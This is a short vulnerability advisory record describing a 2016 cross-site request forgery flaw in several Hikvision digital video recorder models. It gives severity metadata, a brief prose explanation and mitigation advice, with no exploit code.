Vendor: Hikvision Digital Video Recorder
By: Gjoko 'LiquidWorm' Krstic
CVSS: 7.5 (HIGH)
CWE: 352 (Cross-Site Request Forgery)
Product Name: Hikvision Digital Video Recorder
Affected Version From: LV-D2104CS, DS-7316HFI-ST, DS-7216HVI-SV/A, DS-7208HVI-SH, DS-7204HVI-SH
Affected Version To: LV-D2104CS, DS-7316HFI-ST, DS-7216HVI-SV/A, DS-7208HVI-SH, DS-7204HVI-SH
Patch Exists: YES
Related CWE: N/A
CPE: hikvision:digital_video_recorder
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Hikvision-Webs
2016
Hikvision Digital Video Recorder Cross-Site Request Forgery
The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.
Mitigation:
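Implementing proper validation of incoming requests (for example, a per-session anti-CSRF token that is checked on every state-changing request) together with authentication checks can help mitigate the risk of CSRF attacks.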